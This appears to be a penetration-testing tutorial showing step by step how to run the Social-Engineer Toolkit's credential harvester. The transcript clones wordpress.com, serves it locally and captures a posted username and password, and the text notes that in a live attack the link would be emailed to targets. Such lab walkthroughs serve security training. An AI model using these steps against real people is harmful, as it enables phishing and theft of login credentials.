Social Engineering Toolkit (SET) has been a very popular tool for sometime now . SET enables the Penetration Tester to perform many complex Social Engineering Attacks through a Menu driven tool . SET runs in terminal and is a menu driven tool. SET performs many complex tasks in the background and saves the penetration tester a lot of time .
The goal of this tutorial is to configure and execute a Credential Harvester attack with SET.
A typical SET attack needs a server with a public address, which is difficult to simulate in a lab. Instead, SET will be used to launch the attack on the local network and the you can manually visit the malicious site for the sake of this tutorial . In a live attack, the SET server would be accessible via the Internet and the malicious link would be sent to the target using web mail, an ISP email account, or a dedicated phishing email account. Start the lab by launching SET.
Let the Penetration testing begin :
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 5.3.5 [---]
[---] Codename: 'NextGen Unicorn' [---]
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @Dave_ReL1K [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
This is the Opening screen of SET .
SET is a vast tool and comes with a lot of functionality . Therefore for the sake of this tutorial we will focus on Credential Harvester Attack .
This tutorial will focus on option 1, Social-Engineering Attacks, so type in 1 and hit enter.
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
This menu provides access to the QRCode and Infectious Media attacks. To access the Credential Harvester attack, select option 2. SET will then provide a brief description of each of the Website Attack vectors.
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Create or import a CodeSigning Certificate
99) Return to Main Menu
Select option 3 to access the Credential Harvester attack configuration.
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Option 1 will clone one of a number of predefined sites. Option 2 allows the tester to choose a site to clone. This option can be used to clone the target organization’s web site. Option 3 allows the tester to import a custom HTML template. Select option 2. SET will ask for the IP address to listen on, this should be the IP address of the Kali machine. In addition, SET will ask for the URL of the site to clone, enter http://wordpress.com.
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:<Kali IP Address>
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://wordpress.com
[*] Cloning the website: http://wordpress.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
At this point, SET is serving the cloned site with the embedded credential harvester code. Open a browser window and go to http://<ip address of Kali>. As the target users login to the cloned site, the credentials used will be displayed by SET.
192.168.1.12 - - [30/Nov/2013 16:10:44] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: log=SomeUsername
POSSIBLE PASSWORD FIELD FOUND: pwd=SomePassword
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
SET is a complex tool and can be a little flaky at times. It is always best to thoroughly test any attacks before launching them. If there are any problems with the chosen attack method, exit out of SET completely and restart the attack .
In case you are stuck anywhere please put you comment .